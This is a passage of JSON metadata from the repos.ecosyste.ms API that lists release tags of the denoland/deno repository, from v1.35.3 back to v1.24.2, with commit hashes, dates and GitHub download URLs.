:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1